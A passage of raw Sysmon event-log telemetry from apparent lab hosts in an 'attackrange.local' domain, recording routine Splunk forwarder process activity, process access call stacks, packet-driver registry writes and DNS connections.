Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.572{69CF5F33-8CDB-6151-027A-00000000FD01}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.956{5EBD8912-8CDC-6151-6E00-00000000FD01}26083828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+2016cb|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6e213|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001054290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:28.956{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 644600x80000000000000001054289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.956C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 13241300x80000000000000001054288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:28.956{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000001054287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:28.956{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 354300x80000000000000001054286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:26.430{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52019- 354300x80000000000000001054285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:26.149{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61543- 10341000x80000000000000001054284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.269{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000980626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CDC-6151-047A-00000000FD01}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 